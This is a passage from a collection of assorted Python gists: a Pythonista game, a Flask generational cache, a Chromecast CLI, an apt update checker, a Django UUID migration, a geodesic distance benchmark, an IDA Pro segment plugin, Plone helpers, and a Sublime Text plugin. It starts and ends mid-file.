def touch_began(self, touch):
if len(self.touches) > 1:
self.paused = True if not self.paused else False
if len(self.touches) == 3:
self.grid.create_life()
run(MyScene())
```
#### File: hard-gists/8949577/snippet.py
```python
from scene import *
from PIL import Image
import sound
import random
GAME_READY = 0
GAME_PLAY = 1
GAME_DYING = 2
GAME_DEAD = 3
FLOOR_IMGS = ['Ear_Of_Rice', 'Herb', 'Snail', 'Spiral_Shell', 'Turtle', 'Anchor', 'Pile_Of_Poo', 'Sailboat', 'Speedboat']
BACK_IMGS = ['Blowfish', 'Dolphin', 'Fish', 'Tropical_Fish', 'Whale']
class GameEnvironment(object):
def __init__(self, x, y, w, h):
self.playfield = Rect(x, y, w, h)
self.gravity = int(h *-3.000) # 3000
self.scroll = int(h * 0.300) # 300
self.float_max = int(h * 0.300) # 300
self.float_min = int(h * 0.050) # 50
self.jump = int(h * 0.800) # 800
self.gap = int(h * 0.360) # 360
self.ground_height = int(h * 0.100) # 100
self.tower_width = int(h * 0.140) # 140
self.tower_cap = int(h * 0.065) # 65
self.tower_gap = (self.playfield.w - (self.tower_width * 2)) / 2
self.tower_min_height = self.tower_cap
self.tower_max_height = self.playfield.h - self.ground_height - self.tower_cap - self.tower_gap
self.player_width = int(h * 0.080) # 80
self.player_height = int(h * 0.080) # 80
self.player_x = int(h * 0.200) # 200
self.player_y = self.playfield.h / 2 + self.ground_height
self.bubble_min = int(h * 0.002) # 2
self.bubble_max = int(h * 0.020) # 20
self.floor_min = int(h * 0.040) # 40
self.floor_max = int(h * 0.128) # 128
self.back_min = int(h * 0.020) # 20
self.back_max = int(h * 0.040) # 40
self.text_x = w / 2
self.text_1_y = 0.9 * h
self.text_2_y = 0.6 * h
self.text_3_y = 0.4 * h
self.font_size = int(h * 0.064) # 64
self.font = 'AvenirNext-Heavy'
self.score = 0
self.best = 0
self.crash = False
self.gametime = 0
self.deadtime = 0
self.state = GAME_READY
class Bubble(object):
def __init__(self, x, y, w, h, float):
self.bounds = Rect(x, y, w, h)
self.float = float
self.alpha = random.random()
self.img = 'White_Circle'
def draw(self):
tint(1, 1, 1, self.alpha)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class Player(object):
def __init__(self, x, y, w, h):
self.bounds = Rect(x, y, w, h)
img = Image.open('Octopus').transpose(Image.FLIP_LEFT_RIGHT)
self.img = load_pil_image(img)
self.velocity = 0
self.jumped = False
def draw(self):
tint(1.00, 1.00, 1.00)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class FloorSprite(object):
def __init__(self, env):
self.env = env
self.set_random_bounds()
self.set_random_image()
def set_random_image(self):
img = Image.open(FLOOR_IMGS[random.randint(0, len(FLOOR_IMGS) - 1)])
if(random.random() > 0.5):
img = img.transpose(Image.FLIP_LEFT_RIGHT)
self.img = load_pil_image(img)
def set_random_bounds(self):
env = self.env
size = random.randint(env.floor_min, env.floor_max)
y = random.randint(env.playfield.bottom(), env.ground_height)
x = random.randint(env.playfield.left(), env.playfield.right() + env.playfield.w)
self.bounds = Rect(x, y, size, size)
def draw(self):
tint(1,1,1)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class BackgroundSprite(object):
def __init__(self, env):
self.env = env
self.velocity = env.scroll / 4
self.set_random_bounds()
self.set_random_image()
def set_random_image(self):
img = Image.open(BACK_IMGS[random.randint(0, len(BACK_IMGS) - 1)])
self.velocity = random.randint(self.env.scroll / 4, self.env.scroll / 2)
if(random.random() > 0.5):
img = img.transpose(Image.FLIP_LEFT_RIGHT)
self.velocity *= -1
self.img = load_pil_image(img)
def set_random_bounds(self):
env = self.env
size = random.randint(env.back_min, env.back_max)
y = random.randint(env.ground_height, env.playfield.top() - size)
if self.velocity < 0:
x = env.playfield.left()
else:
x = env.playfield.right()
self.bounds = Rect(x, y, size, size)
def draw(self):
tint(1,1,1)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class Ground(object):
def __init__(self, x, y, w, h):
self.bounds = Rect(x, y, w, h)
def draw(self):
stroke_weight(4)
stroke(0.00, 0.00, 0.00)
fill(0.50, 0.25, 0.00)
rect(self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class Tower(object):
def __init__(self, x, env):
self.x = x
self.env = env
self.create_towers_and_caps()
def set_x(self, x):
self.x = x
self.lower_tower.x = x + 6
self.lower_cap.x = x
self.upper_tower.x = x + 6
self.upper_cap.x = x
def right(self):
return self.lower_tower.right()
def left(self):
return self.lower_tower.left()
def create_towers_and_caps(self):
self.passed = False
height = random.randint(self.env.tower_min_height, self.env.tower_max_height)
self.lower_tower = Rect(self.x + 6, self.env.ground_height, self.env.tower_width - 12, height)
self.lower_cap = Rect(self.x, self.env.ground_height + height - self.env.tower_cap, self.env.tower_width, self.env.tower_cap)
self.upper_tower = Rect(self.x + 6, height + self.env.gap, self.env.tower_width - 12, self.env.playfield.h - height + self.env.gap)
self.upper_cap = Rect(self.x, height + self.env.gap, self.env.tower_width, self.env.tower_cap)
def intersects(self, r):
return self.lower_tower.intersects(r) or self.upper_tower.intersects(r)
def draw(self):
stroke_weight(4)
stroke(0.00, 0.50, 0.25)
stroke(0.20, 0.20, 0.00)
fill(0.00, 1.00, 0.00)
fill(0.50, 0.50, 0.00)
rect(self.lower_tower.x, self.lower_tower.y, self.lower_tower.w, self.lower_tower.h)
rect(self.lower_cap.x, self.lower_cap.y, self.lower_cap.w, self.lower_cap.h)
rect(self.upper_tower.x, self.upper_tower.y, self.upper_tower.w, self.upper_tower.h)
rect(self.upper_cap.x, self.upper_cap.y, self.upper_cap.w, self.upper_cap.h)
class Game(object):
def __init__(self, x, y, w, h):
self.env = GameEnvironment(x, y, w, h)
self.game_setup()
def game_setup(self):
self.env.score = 0
self.env.crash = False
self.env.state = GAME_READY
self.create_game_objects()
def create_game_objects(self):
self.player = Player(self.env.player_x, self.env.player_y, self.env.player_width, self.env.player_height)
self.ground = Ground(self.env.playfield.x, self.env.playfield.y, self.env.playfield.w, self.env.ground_height)
self.towers = []
x = self.env.playfield.w * 2
for t in range(3):
self.towers.append(Tower(x, self.env))
x += self.env.tower_width + self.env.tower_gap
self.bubbles = []
for t in range(10):
d = random.randint(0, 20)
self.bubbles.append(Bubble(random.randint(0, self.env.playfield.w), random.randint(0, self.env.playfield.h), d, d,random.randint(self.env.float_min, self.env.float_max)))
self.floor_sprites = []
for t in range(1):
self.floor_sprites.append(FloorSprite(self.env))
self.background_sprites = []
for t in range(2):
self.background_sprites.append(BackgroundSprite(self.env))
def move_player(self, dt):
if(self.env.state == GAME_DEAD):
return
elif((self.env.state == GAME_READY) and (self.player.bounds.y < (self.env.playfield.h / 2)) or self.player.jumped):
self.player.jumped = False
self.player.velocity = self.env.jump
else:
self.player.velocity = self.player.velocity + self.env.gravity * dt
self.player.bounds.y += self.player.velocity * dt
def move_towers(self, dt):
if(self.env.state == GAME_PLAY):
move = self.env.scroll * dt
for tower in self.towers:
tower.set_x(tower.x - move)
if tower.right() < self.env.playfield.x:
tower.set_x(self.env.playfield.w + self.env.tower_gap)
tower.create_towers_and_caps()
def move_bubbles(self, dt):
if(self.env.state == GAME_DEAD):
return
for bubble in self.bubbles:
if (bubble.bounds.bottom() > self.env.playfield.top()) or (bubble.bounds.left() < self.env.playfield.left()):
x = random.randint(self.env.playfield.left(), self.env.playfield.right() + self.env.playfield.w)
y = self.env.playfield.bottom() - random.randint(0, self.env.bubble_max)
d = random.randint(self.env.bubble_min, self.env.bubble_max)
bubble.bounds = Rect(x, y, d, d)
bubble.float = random.randint(self.env.float_min, self.env.float_max)
bubble.bounds.y += bubble.float * dt
if(self.env.state <> GAME_DYING):
bubble.bounds.x -= self.env.scroll * dt
def move_floor_sprites(self, dt):
if(self.env.state == GAME_READY) or (self.env.state == GAME_PLAY):
move = self.env.scroll * dt
for sprite in self.floor_sprites:
sprite.bounds.x -= move
if sprite.bounds.right() < self.env.playfield.left():
sprite.set_random_image()
sprite.set_random_bounds()
sprite.bounds.x = random.randint(self.env.playfield.right(), self.env.playfield.right() + self.env.playfield.w)
def move_background_sprites(self, dt):
if(self.env.state == GAME_READY) or (self.env.state == GAME_PLAY):
for sprite in self.background_sprites:
move = sprite.velocity * dt
sprite.bounds.x -= move
if(sprite.bounds.right() < self.env.playfield.left()) or (sprite.bounds.left() > self.env.playfield.right()):
sprite.set_random_image()
sprite.set_random_bounds()
def update_score(self):
if(self.env.state == GAME_PLAY):
for tower in self.towers:
if tower.passed == False:
if tower.left() < self.player.bounds.right():
tower.passed = True
self.env.score += 1
sound.play_effect('Coin_1')
def player_dead(self):
self.env.state = GAME_DEAD
self.env.dead_time = self.env.game_time
if self.env.score > self.env.best:
self.env.best = self.env.score
def collision_detect(self):
if(self.env.state == GAME_PLAY):
if self.player.bounds.bottom() < self.ground.bounds.top():
sound.play_effect('Crashing')
self.env.crash = True
self.player_dead()
elif(self.env.state == GAME_DYING):
if self.player.bounds.bottom() < self.ground.bounds.top():
self.player_dead()
if self.env.state == GAME_PLAY:
if self.player.bounds.bottom() > self.env.playfield.top():
self.env.crash = True
self.env.state = GAME_DYING
else:
for tower in self.towers:
if tower.intersects(self.player.bounds):
sound.play_effect('Crashing')
self.env.crash = True
self.env.state = GAME_DYING
def text_shadow(self, s, y):
tint(0, 0, 0)
text(s, self.env.font, self.env.font_size, self.env.text_x + 4, y - 4)
tint(1, 1, 1)
text(s, self.env.font, self.env.font_size, self.env.text_x, y)
def draw(self):
if(self.env.crash):
background(1, 1, 1)
self.env.crash = False
else:
background(0.00, 0.50, 0.50)
for bubble in self.bubbles:
bubble.draw()
for sprite in self.background_sprites:
sprite.draw()
self.ground.draw()
for tower in self.towers:
tower.draw()
self.player.draw()
for sprite in self.floor_sprites:
sprite.draw()
tint(0, 0, 0)
if(self.env.state == GAME_READY):
self.text_shadow("Tap to Start!", self.env.text_2_y)
elif((self.env.state == GAME_PLAY) or (self.env.state == GAME_DYING) or (self.env.state == GAME_READY)):
self.text_shadow(str(int(self.env.score)), self.env.text_1_y)
elif(self.env.state == GAME_DEAD):
self.text_shadow("Score : " + str(int(self.env.score)), self.env.text_2_y)
self.text_shadow("Best : " + str(int(self.env.best)), self.env.text_3_y)
def loop(self, dt, t):
self.env.game_time = t
self.move_player(dt)
self.move_towers(dt)
self.move_bubbles(dt)
self.move_floor_sprites(dt)
self.move_background_sprites(dt)
self.update_score()
self.collision_detect()
self.draw()
def screen_tapped(self):
if(self.env.state == GAME_READY):
self.env.state = GAME_PLAY
if(self.env.state == GAME_PLAY):
self.player.jumped = True
sound.play_effect('Boing_1')
elif(self.env.state == GAME_DEAD):
if(self.env.dead_time + 0.5 < self.env.game_time):
self.game_setup()
class MyScene (Scene):
def setup(self):
self.game = Game(self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
def draw(self):
self.game.loop(self.dt, self.t)
def touch_began(self, touch):
self.game.screen_tapped()
run(MyScene(), PORTRAIT)
```
#### File: hard-gists/8951985/snippet.py
```python
import logging
import pylibmc
from werkzeug.contrib.cache import MemcachedCache
from flask import request
from flask.ext.cache import Cache
log = logging.getLogger(__name__)
mc = MemcachedCache()
class GrovemadeCache(Cache):
'''
Grovemade specific caching
'''
def get_generation(self):
'''
Incremenent generation to invalidate all keys.
'''
return mc.get('GENERATION-KEY')
def inc_generation(self):
try:
mc.inc('GENERATION-KEY')
except pylibmc.NotFound:
mc.set('GENERATION-KEY', '1') # memcached increments string integers
def get_group_key(self, group):
return u'GROUP-KEY:%s' % group
def get_groups_key(self, groups):
'''
Get a generation key for a list of groups
'''
# groups_key = u''
key_values = []
for group in groups:
group_key = self.get_group_key(group)
group_version = mc.get(group_key)
if group_version is None:
group_version = '1'
mc.set(group_key, group_version)
key_values.append(group_version)
groups_key = u':'.join(key_values)
return groups_key
def inc_group(self, group):
'''
Increment group. Call to invalidate cache for entire group.
'''
try:
mc.inc(self.get_group_key(group))
except pylibmc.NotFound:
mc.set(self.get_group_key(group), '1') # memcached increments string integers
def build_group_key_prefix(self, groups=None):
'''
Generational caching strategy.
Generation is global to all groups
Groups are local to arbitrary groupings, such as "product" and "collection"
All may be expired at will.
'''
if groups is None:
groups = []
return u'{generation}:{groups}'.format(
groups=self.get_groups_key(groups),
generation=self.get_generation(),
)
# def cached(self, timeout=None, key_prefix='view/%s', unless=None):
def cached_generational(self, timeout=None, groups=None, key_prefix='view/%s', unless=None):
'''
Build generational cache key. Always vary on PJAX.
'''
def build_key():
if callable(key_prefix):
cache_key = key_prefix()
elif '%s' in key_prefix:
cache_key = key_prefix % request.path
else:
cache_key = key_prefix
key = cache_key + self.build_group_key_prefix(groups) + request.headers.get('X-PJAX', '')
return key
# log.debug(u"Built group key: %s" % key)
return self.cached(timeout=timeout, key_prefix=build_key, unless=None)
```
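A sketch of how the generational cache above might be wired into a Flask app; the app setup, route, and group name are assumptions for illustration:
```python
from flask import Flask

app = Flask(__name__)
cache = GrovemadeCache(app, config={'CACHE_TYPE': 'memcached'})

@app.route('/products/<slug>')
@cache.cached_generational(timeout=300, groups=['product'])
def product_detail(slug):
    return u'rendered page for %s' % slug

# After a product changes, bump its group to invalidate every view cached
# under it, without touching other groups or the global generation:
cache.inc_group('product')
```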
#### File: hard-gists/8b100c205b8c35b3c8ce/snippet.py
```python
import pychromecast
import argparse
def play_video(url, cast):
if cast.media_controller.status.player_state == "PAUSED" or cast.media_controller.status.content_id == url:
cast.media_controller.play()
else:
cast.play_media((url), "video/mp4")
def pause_video(cast):
if cast.media_controller.status.supports_pause:
cast.media_controller.pause()
else:
print "Cannot pause"
def stop_video(cast):
cast.quit_app()
def main():
casts = pychromecast.get_chromecasts_as_dict()
parser = argparse.ArgumentParser()
parser.add_argument("url", nargs="?", help="URL of media to play. Doesn't support local addresses yet.")
# parser.add_argument("-p", "--pause", help="Pause playback", action='store_true')
parser.add_argument("-s", "--stop", help="Stop playback", action='store_true')
parser.add_argument("-d", "--device", help="Select device. List devices with -D")
parser.add_argument("-D", "--devices", help="List devices", action='store_true')
args = parser.parse_args()
if args.devices:
print ", ".join(casts.keys())
return
if args.device:
cast = casts[args.device]
else:
cast = casts[casts.keys()[0]]
if not args.stop:
play_video(args.url, cast)
return
# elif args.pause:
# pause_video(cast)
# return
elif args.stop:
stop_video(cast)
return
if __name__ == "__main__":
main()
```
#### File: hard-gists/8b1502a49d8b20a6ae70/snippet.py
```python
import apt
import apt_pkg
from time import strftime
import os
import subprocess
import sys
"""
Following functions are used to return package info of available updates.
See: /usr/lib/update-notifier/apt_check.py
"""
SYNAPTIC_PINFILE = "/var/lib/synaptic/preferences"
DISTRO = subprocess.check_output(["lsb_release", "-c", "-s"],
universal_newlines=True).strip()
def clean(cache,depcache):
""" unmark (clean) all changes from the given depcache """
# mvo: looping is too inefficient with the new auto-mark code
# for pkg in cache.Packages:
# depcache.MarkKeep(pkg)
depcache.init()
def saveDistUpgrade(cache,depcache):
""" this functions mimics a upgrade but will never remove anything """
depcache.upgrade(True)
if depcache.del_count > 0:
clean(cache,depcache)
depcache.upgrade()
def get_update_packages():
"""
Return a list of dict about package updates
"""
pkgs = []
apt_pkg.init()
# force apt to build its caches in memory for now to make sure
# that there is no race when the pkgcache file gets re-generated
apt_pkg.config.set("Dir::Cache::pkgcache","")
try:
cache = apt_pkg.Cache(apt.progress.base.OpProgress())
except SystemError as e:
sys.stderr.write("Error: Opening the cache (%s)" % e)
sys.exit(-1)
depcache = apt_pkg.DepCache(cache)
# read the pin files
depcache.read_pinfile()
# read the synaptic pins too
if os.path.exists(SYNAPTIC_PINFILE):
depcache.read_pinfile(SYNAPTIC_PINFILE)
# init the depcache
depcache.init()
try:
saveDistUpgrade(cache,depcache)
except SystemError as e:
sys.stderr.write("Error: Marking the upgrade (%s)" % e)
sys.exit(-1)
# use assignment here since apt.Cache() doesn't provide a __exit__ method
# on Ubuntu 12.04 it looks like
# aptcache = apt.Cache()
for pkg in cache.packages:
if not (depcache.marked_install(pkg) or depcache.marked_upgrade(pkg)):
continue
inst_ver = pkg.current_ver
cand_ver = depcache.get_candidate_ver(pkg)
if cand_ver == inst_ver:
continue
record = {"name": pkg.name,
"security": isSecurityUpgrade(pkg, depcache),
"section": pkg.section,
"current_version": inst_ver.ver_str if inst_ver else '-',
"candidate_version": cand_ver.ver_str if cand_ver else '-',
"priority": cand_ver.priority_str}
pkgs.append(record)
return pkgs
def isSecurityUpgrade(pkg, depcache):
def isSecurityUpgrade_helper(ver):
""" check if the given version is a security update (or masks one) """
security_pockets = [("Ubuntu", "%s-security" % DISTRO),
("gNewSense", "%s-security" % DISTRO),
("Debian", "%s-updates" % DISTRO)]
for (file, index) in ver.file_list:
for origin, archive in security_pockets:
if (file.archive == archive and file.origin == origin):
return True
return False
inst_ver = pkg.current_ver
cand_ver = depcache.get_candidate_ver(pkg)
if isSecurityUpgrade_helper(cand_ver):
return True
# now check for security updates that are masked by a
# candidate version from another repo (-proposed or -updates)
for ver in pkg.version_list:
if (inst_ver and
apt_pkg.version_compare(ver.ver_str, inst_ver.ver_str) <= 0):
#print "skipping '%s' " % ver.VerStr
continue
if isSecurityUpgrade_helper(ver):
return True
return False
def print_result(pkgs):
"""
Print package updates in a table
"""
security_updates = filter(lambda x: x.get('security'), pkgs)
text = list()
text.append('Check Time: %s' % strftime('%m/%d/%Y %H:%M:%S'))
if not pkgs:
text.append('No available updates on this machine.')
else:
# Updates are available, build a table
text.append('%d packages can be updated.' % len(pkgs))
text.append('%d updates are security updates.' % len(security_updates))
text.append('-' * 100)
# List available security updates
text.append('Package Name'.ljust(30) +
'Current Version'.ljust(30) +
'Latest Version'.ljust(30) +
'Security'.ljust(10))
text.append('-' * 100)
for pkg in pkgs:
text.append('{:<30}{:<30}{:<30}{:<10}'.format(pkg.get('name'),
pkg.get('current_version'),
pkg.get('candidate_version'),
'*' if pkg.get('security') else ''))
text.append('=' * 100)
return '\n'.join(text)
if __name__ == '__main__':
pkgs = get_update_packages()
print print_result(pkgs)
```
#### File: hard-gists/8bb867dc631433c01fd0/snippet.py
```python
from __future__ import unicode_literals
import uuid
from django.db import migrations, models
def fill_mymodel_uuid(apps, schema_editor):
db_alias = schema_editor.connection.alias
MyModel = apps.get_model('myapp', 'MyModel')
for obj in MyModel.objects.using(db_alias).all():
obj.uuid = uuid.uuid4()
obj.save()
class Migration(migrations.Migration):
""" Change model with integer pk to UUID pk. This migration presumes there
are no db constraints (foreign keys) to this table.
Note: this migration is not reversible. See the comment above the
`RemoveField` operation. Further, this migration is possible in part due
to the fact that there are currently no foreign key constraints on this table.
"""
dependencies = [
# ...
]
operations = [
migrations.AddField(
model_name='mymodel',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.RunPython(fill_mymodel_uuid, migrations.RunPython.noop),
migrations.AlterField(
model_name='mymodel',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, unique=True),
),
# this RemoveField operation is irreversible, because in order to
# recreate it, the primary key constraint on the UUIDField would first
# have to be dropped.
migrations.RemoveField('MyModel', 'id'),
migrations.RenameField(
model_name='mymodel',
old_name='uuid',
new_name='id'
),
migrations.AlterField(
model_name='mymodel',
name='id',
field=models.UUIDField(primary_key=True, default=uuid.uuid4, serialize=False, editable=False, unique=True),
),
]
```
#### File: hard-gists/8bbcc202a915e965c6a6d4f561d0e482/snippet.py
```python
from math import radians, sin, cos, asin, sqrt, pi, atan, atan2, fabs
from time import time
import geopy.distance
import pyproj
from geographiclib.geodesic import Geodesic, Constants
import geodesy.sphere as geo
geod = pyproj.Geod(ellps='WGS84')
geodesic = Geodesic(a=Constants.WGS84_a,f=Constants.WGS84_f)
p_minsk = (27.561831, 53.902257)
p_moscow = (37.620393, 55.75396)
# https://en.wikipedia.org/wiki/Earth_radius#Mean_radius
EARTH_MEAN_RADIUS = 6371008.8
EARTH_MEAN_DIAMETER = 2 * EARTH_MEAN_RADIUS
# https://en.wikipedia.org/wiki/Earth_radius#Equatorial_radius
EARTH_EQUATORIAL_RADIUS = 6378137.0
EARTH_EQUATORIAL_METERS_PER_DEGREE = pi * EARTH_EQUATORIAL_RADIUS / 180 # 111319.49079327358
I_EARTH_EQUATORIAL_METERS_PER_DEGREE = 1 / EARTH_EQUATORIAL_METERS_PER_DEGREE
def approximate_distance(point1, point2):
'''
Approximate calculation distance
(expanding the trigonometric functions around the midpoint)
'''
lon1, lat1 = (radians(coord) for coord in point1)
lon2, lat2 = (radians(coord) for coord in point2)
cos_lat = cos((lat1+lat2)/2.0)
dx = (lat2 - lat1)
dy = (cos_lat*(lon2 - lon1))
return EARTH_MEAN_RADIUS*sqrt(dx**2 + dy**2)
def haversine_distance(point1, point2):
'''
Calculating haversine distance between two points
(see https://en.wikipedia.org/wiki/Haversine_formula,
https://www.math.ksu.edu/~dbski/writings/haversine.pdf)
Is numerically better-conditioned for small distances
'''
lon1, lat1 = (radians(coord) for coord in point1[:2])
lon2, lat2 = (radians(coord) for coord in point2[:2])
dlat = (lat2 - lat1)
dlon = (lon2 - lon1)
a = (
sin(dlat * 0.5)**2 +
cos(lat1) * cos(lat2) * sin(dlon * 0.5)**2
)
return EARTH_MEAN_DIAMETER * asin(sqrt(a))
def great_circle(point1, point2):
'''
Calculating great-circle distance
(see https://en.wikipedia.org/wiki/Great-circle_distance)
'''
lon1, lat1 = (radians(coord) for coord in point1)
lon2, lat2 = (radians(coord) for coord in point2)
dlon = fabs(lon1 - lon2)
dlat = fabs(lat1 - lat2)
numerator = sqrt(
(cos(lat2)*sin(dlon))**2 +
((cos(lat1)*sin(lat2)) - (sin(lat1)*cos(lat2)*cos(dlon)))**2)
denominator = (
(sin(lat1)*sin(lat2)) +
(cos(lat1)*cos(lat2)*cos(dlon)))
c = atan2(numerator, denominator)
return EARTH_MEAN_RADIUS*c
# 1
t = time()
for i in range(1000000):
distance = haversine_distance(p_minsk, p_moscow)
print("#1 haversine fun: %s (%s)" % (distance, time() - t))
# 2
t = time()
for i in range(1000000):
distance = great_circle(p_minsk, p_moscow)
print("#2 great circle fun: %s (%s)" % (distance, time() - t))
# 3
t = time()
for i in range(1000000):
distance = geopy.distance.vincenty(p_minsk[::-1], p_moscow[::-1], ellipsoid='WGS-84').meters
print("#3 geopy: %s (%s)" % (distance, time() - t))
# 4
# http://jswhit.github.io/pyproj/pyproj.Geod-class.html#inv
t = time()
for i in range(1000000):
_az12, _az21, distance = geod.inv(*list(p_minsk + p_moscow))
print("#4 pyproj: %s (%s)" % (distance, time() - t))
# 5
# http://geographiclib.sourceforge.net/1.46/python/code.html#geographiclib.geodesic.Geodesic.Inverse
t = time()
for i in range(1000000):
r = geodesic.Inverse(*(p_minsk[::-1] + p_moscow[::-1]), outmask=geodesic.DISTANCE)
print("#5 geographiclib: %s (%s)" % (r['s12'], time() - t))
# 6
# https://github.com/xoolive/geodesy
t = time()
for i in range(1000000):
d = geo.distance(p_minsk[::-1], p_moscow[::-1])
print("#6 geodesy: %s (%s)" % (d, time() - t))
'''
#1 haversine fun: 675656.2994818708 (2.1997811794281006)
#2 great circle fun: 675656.2994818711 (2.8947739601135254)
#3 geopy: 677789.5312317797 (32.68954396247864)
#4 pyproj: 677789.531232748 (11.323993921279907)
#5 geographiclib: 677789.5312327482 (195.3897831439972)
#6 geodesy: 675655.366226931 (0.7595169544219971)
'''
'''
Using PostGIS
# select ST_Length(ST_GeomFromText('LINESTRING(27.561831 53.902257, 37.620393 55.75396)',4326), true) as length;
length
------------------
677789.531232748
(1 row)
'''
```
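For reference, the haversine formula that `haversine_distance` above implements, with φ latitude, λ longitude, and R the mean Earth radius (`EARTH_MEAN_RADIUS`):

$$a = \sin^2\!\left(\tfrac{\Delta\varphi}{2}\right) + \cos\varphi_1 \cos\varphi_2 \,\sin^2\!\left(\tfrac{\Delta\lambda}{2}\right), \qquad d = 2R \arcsin\!\sqrt{a}$$

This matches the code's `EARTH_MEAN_DIAMETER * asin(sqrt(a))`, since `EARTH_MEAN_DIAMETER = 2 * EARTH_MEAN_RADIUS`.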
#### File: hard-gists/8bfa8e25f36e6f619247203d1bc0291b/snippet.py
```python
import logging
import os
import sys
from collections import namedtuple
import idc
import idaapi
import idautils
logger = logging.getLogger(__name__)
class BadInputError(Exception):
pass
Segment = namedtuple('SegmentBuffer', ['path', 'name', 'addr'])
def prompt_for_segment():
''' :returns: a Segment instance, or raises BadInputError '''
class MyForm(idaapi.Form):
def __init__(self):
idaapi.Form.__init__(self, """STARTITEM 0
add segment by buffer
<##buffer path:{path}>
<##segment name:{name}>
<##segment start address:{addr}>
""",
{
'path': idaapi.Form.FileInput(open=True),
'name': idaapi.Form.StringInput(),
'addr': idaapi.Form.NumericInput(tp=idaapi.Form.FT_ADDR),
})
def OnFormChange(self, fid):
return 1
f = MyForm()
f.Compile()
f.path.value = ""
f.name.value = ""
f.addr.value = 0x0
ok = f.Execute()
if ok != 1:
raise BadInputError('user cancelled')
path = f.path.value
if path == "" or path is None:
raise BadInputError('bad path provided')
if not os.path.exists(path):
raise BadInputError('file doesn\'t exist')
name = f.name.value
if name == "" or name is None:
raise BadInputError('bad name provided')
addr = f.addr.value
f.Free()
return Segment(path, name, addr)
def main(argv=None):
if argv is None:
argv = sys.argv[:]
try:
seg = prompt_for_segment()
except BadInputError:
logger.error('bad input, exiting...')
return -1
with open(seg.path, 'rb') as f:
buf = f.read()
seglen = len(buf)
if seglen % 0x1000 != 0:
seglen = seglen + (0x1000 - (seglen % 0x1000))
if not idc.AddSeg(seg.addr, seg.addr + seglen, 0, 1, 0, idaapi.scPub):
logger.error('failed to add segment: 0x%x', seg.addr)
return -1
if not idc.RenameSeg(seg.addr, seg.name):
logger.warning('failed to rename segment: %s', seg.name)
if not idc.SetSegClass(seg.addr, 'CODE'):
logger.warning('failed to set segment class CODE: %s', seg.name)
if not idc.SegAlign(seg.addr, idc.saRelPara):
logger.warning('failed to align segment: %s', seg.name)
idaapi.patch_many_bytes(seg.addr, buf)
class AddSegmentPlugin(idaapi.plugin_t):
flags = idaapi.PLUGIN_KEEP
comment = "Add a segment to an IDA .idb from a file."
help = "Add a segment to an IDA .idb from a file."
wanted_name = "AddSegment"
wanted_hotkey = "Alt-F8"
def init(self):
return idaapi.PLUGIN_OK
def run(self, arg):
main()
def term(self):
pass
def PLUGIN_ENTRY():
return AddSegmentPlugin()
#if __name__ == '__main__':
# logging.basicConfig(level=logging.DEBUG)
# main()
```
#### File: hard-gists/8cb3aa12e73a6df8d6b6/snippet.py
```python
from zope.schema import getFields
from zope.interface import providedBy
from zope.interface import implementedBy
from zope.component import getUtility
from zope.component import queryUtility
from plone.behavior.interfaces import IBehavior
from plone.behavior.interfaces import IBehaviorAssignable
from plone.dexterity.interfaces import IDexterityFTI
from plone.dexterity.utils import resolveDottedName
def get_obj_schema(obj):
for iface in providedBy(obj).flattened():
for name, field in getFields(iface).items():
yield name, field
assignable = IBehaviorAssignable(obj, None)
if assignable:
for behavior in assignable.enumerateBehaviors():
for name, field in getFields(behavior.interface).items():
yield name, field
def getBehaviorsFor(context=None, portal_type=None):
if context is None and portal_type is None:
return
if context is None:
fti = getUtility(IDexterityFTI, name=portal_type)
for behavior_name in fti.behaviors:
behavior_interface = None
behavior_instance = queryUtility(IBehavior, name=behavior_name)
if not behavior_instance:
try:
behavior_interface = resolveDottedName(behavior_name)
except (ValueError, ImportError):
continue
else:
behavior_interface = behavior_instance.interface
if behavior_interface is not None:
yield behavior_interface
else:
behavior_assignable = IBehaviorAssignable(context, None)
for behavior_reg in behavior_assignable.enumerateBehaviors():
yield behavior_reg.interface
def getInterfacesFor(context=None, portal_type=None):
if context is None and portal_type is None:
return
if context is None:
kwargs = { 'portal_type': portal_type }
fti = queryUtility(IDexterityFTI, name=portal_type)
else:
kwargs = { 'context': context }
fti = queryUtility(IDexterityFTI, name=context.portal_type)
if fti is None:
return
for interface in implementedBy(resolveDottedName(fti.klass)):
yield interface
for schema in getBehaviorsFor(**kwargs):
yield schema
yield fti.lookupSchema()
```
#### File: hard-gists/8eabf18a6a79f5dbe3f4/snippet.py
```python
import sublime
import sublime_plugin
from sublime import Region, Selection
import os
import re
# { "keys": ["ctrl+r"], "command": "pepo_jump" },
class PepoJump(sublime_plugin.WindowCommand):
def run(self, **kwargs):
win = self.window
view = win.active_view()
fpath = view.file_name()
self.view = view
self.fpath = fpath
if fpath:
self.fdir = os.path.dirname(fpath)
_, ext = os.path.splitext(fpath)
self.ext = ext.lower()
else:
self.fdir = ''
self.ext = ''
sel = view.sel()[0]
self.quick_panel = getattr(self, 'quick_panel', None)
text = kwargs.get('text', None)
is_symbol = False
if self.quick_panel:
self.quick_panel = None
return self.goto_symbol_in_project(self.text)
# return self.find_files()
if text:
is_symbol = False
else:
if sel.begin() == sel.end():
text, is_symbol = self.get_undercursor()
else:
text = view.substr(sel)
if text.find('/') == -1 and text.find('.') == -1:
is_symbol = True
if not text:
self.find_files()
text = os.path.sep.join(fpath.split(os.path.sep)[-2:])
text, _ = os.path.splitext(text)
win.run_command("insert", {"characters": text})
return
self.origin_view = view
self.origin_sel = view.sel()[0]
if is_symbol:
self.goto_symbol(text)
else:
self.goto_file(text)
def goto_file(self, text):
self.text = text
win = self.window
view = self.view
row = 1
m = re.search(r'(?: *line *|:)(\d+):?$', text)
if m:
row = int(m.group(1))
text = re.sub(r':(\d+):?$', '', text)
# todo: file:// http://
# abs path ?
if text[0] == '/' or text[1] == ':' or text[:2] == '\\\\':
if self.try_open_file(text, row=row):
return
# already opened file ?
target = win.find_open_file(text)
if target:
if row > 1:
point = target.text_point(row, 0)
target.show_at_center(point)
return win.focus_view(target)
fpath = self.fpath
dirs = []
if fpath:
# relative from active_view ?
if self.try_open_file(self.fdir, text, row=row):
return
dirs.append(self.fdir)
